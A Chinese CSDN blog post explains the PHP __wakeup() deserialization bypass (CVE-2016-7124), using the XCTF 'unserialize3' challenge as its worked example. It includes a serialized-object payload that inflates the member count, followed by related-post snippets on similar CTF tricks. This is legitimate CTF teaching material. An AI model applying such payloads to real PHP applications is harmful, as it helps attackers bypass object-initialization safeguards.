__wakeup()绕过

已于 2022-10-06 19:18:06 修改
阅读量6.6k 收藏 11
点赞数 5
分类专栏: web知识 文章标签: php
于 2022-04-23 17:58:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52585514/article/details/124367517
版权

PHP5<5.6.25,PHP7 < 7.0.10

__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数

如xctf-unserialize3

只要序列化的中的成员数大于实际成员数,即可绕过

<?php
class xctf
{
    public $flag = '111';

    public function __wakeup()
    {
        exit('bad requests');
    }
}
    $a=new xctf();
var_dump(serialize($a));

得到

string(36) "O:4:"xctf":1:{s:4:"flag";s:3:"111";}"

所以把成员数"1",改为"2"即可绕过

payload:

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

绕过__wakeup(),得到flag

v2ish1yan
关注
专栏目录
__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1129
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
21-3 PHP反序列化漏洞-魔术方法绕过
weixin_43263566的博客
01-17 661
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在反序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客大挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
反序列化__wakeup()绕过
csjjjd的博客
01-24 749
这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
反序列化中_wakeup绕过
rev1ve的博客
09-05 2030
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
绕过__wakeup() 反序列化 合集
Jay17的博客
08-24 1499
绕过__wakeup() 反序列化 合集
攻防世界-unserialize3_魔术函数,以及wakeup()函数的绕过
Fisher
05-15 1375
拿到题目得到一段代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 根据提提示是序列化,将xctf类进行序列化,之后如果执行__wakeup()则会跳出, 所以需要构造函数绕过 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作 所以是将序列化的值反序列化之后执行,因此我们构造序列化的值 先将类进行序列化: <?php
PHP反序列化中如何绕过_wakeup()函数的一些技巧
m0_63138919的博客
08-28 1329
本文为魔术方法_wakeup()的一些绕过用法
[极客大挑战 2019]PHP (简单的php反序列化和__wakeup绕过
xlcvv的博客
04-05 928
这群师傅,不仅懂得D站,html也写的很棒,超喜欢这里的,人长的又帅,说话又好听······ 进入正题,提示备份了网站,那就是WWW.zip了,下载下来: 浏览了一遍,主要在class.php里面: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; ...
PHP-Wakeup魔术漏洞骚操作
HBohan的博客
12-12 1369
起因 前两天在攻防世界做题的时候,看到了一个Wakeup绕过的典型案例。正好拿来写一篇随笔记录。 案例 进入后,我们得到题目代码,我们现在需要读一下这个代码。 先对代码进行一个审计 __wakeup()很容易绕过,只需要令序列化字符串中标识变量数量的值大于实 际变量即可绕过__wakeup()函数 _wakeup()的绕过,大概应该是PHP5<5.6.25,PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过。 (
[天翼杯 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)
oZuoShen123的博客
10-09 830
1、看代码,有unserialize函数,说明要反序列化 2、有 eval($this->code) ,说明要RCE 3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);,说明要绕过waf 4、A的wakeup里面会把code置空,所以要绕过 起点:B(destruct)  终点:A(call) 链条:B(destruct::a=$a)-> A(call::code=命令)
极客大挑战 2019]PHP CVE-2016-7124 绕过__wakeup()
偷一个月亮
09-02 1015
极客大挑战 2019]PHP 扫描发现备份源代码www.zip 注意 private私有属性,不能从外面去更改访问 只能从内部函数里面进行更改 源代码如下: __wakeup()是被反序列后自动调用的函数。 自动将属性改为guest但是和后面的admin有所冲突。 O:4:"Name":2:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";...
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 4002
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
绕过__wakeup,先执行外面的类&天翼杯的eval那个题的一个思考
Je3Z的博客
09-25 417
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ .
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2191
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 509
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
duwentao-[本地复现]-[__wakeup()魔术方法绕过]
qwsn
11-22 1599
0x01、Web 1.duwentao-[本地复现] 第一步:代码审计 <?php #error_reporting(0); //注释掉了关闭错误报告 class SoFun //类:SoFun { protected $file = 'index.php'; //保护属性:$file='index.php' public function __construct($file) //构造方法__construct(),在实例化当前类前,自动被调用,使用参数$f
php---魔术方法(__wakeup和__sleep)
weixin_33856370的博客
02-09 143
2019独角兽企业重金招聘Python工程师标准>>> ...
【bugku】安慰奖(绕过__wakeup
EC_Carrot的博客
12-24 965
题目 右键源代码发现<!-- YmFja3Vwcw== -->,base64解码提示说有备份 我这里用dirsearch扫到备份文件为index.php.bak 源码: error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u
PHP序列化用到的构造:__sleep() __wakeup()
每天记录点滴,日后总有收获。
11-27 5569
PHP进行序列化时,serialize() 检查类中是否有 __sleep() ,如果有,则该函数将在任何序列化之前运行。该函数必须返回一个需要进行序列化保存的成员属性数组,并且只序列化该函数返回的这些成员属性. 该函数有两个作用: 第一. 在序列化之前,关闭对象可能具有的任何数据库连接等. 第二. 指定对象中需要被序列化的成员属性,如果某个属性比较大而不需要储存下来,可以不把它写进__slee
ELAPSED_REALTIME_WAKEUP
最新发布
03-20
ELAPSED_REALTIME_WAKEUP是Android中的一个定时器类型,用于在指定的时间间隔后唤醒设备并执行某个任务。它是基于设备从开机到现在的时间来计算的,不受设备休眠的影响。 ELAPSED_REALTIME_WAKEUP的工作原理如下: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值